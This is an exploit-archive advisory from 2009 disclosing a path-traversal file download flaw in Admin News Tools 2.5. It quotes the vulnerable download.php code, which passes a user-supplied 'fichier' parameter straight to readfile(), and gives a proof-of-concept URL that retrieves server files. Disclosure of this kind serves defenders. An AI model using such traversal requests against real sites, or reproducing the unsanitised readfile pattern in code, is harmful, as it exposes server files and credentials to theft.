[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Admin News Tools 2.5 (fichier) Remote File Disclosure Vulnerability
# Published : 2009-07-15
# Author : Securitylab.ir
# Previous Title : ILIAS LMS <= 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns
# Next Title : ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit


######################### Securitylab.ir ########################
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#===========================================================
# Download.php
# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
# readfile($_GET['fichier']);
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# www.Syue.com [2009-07-15]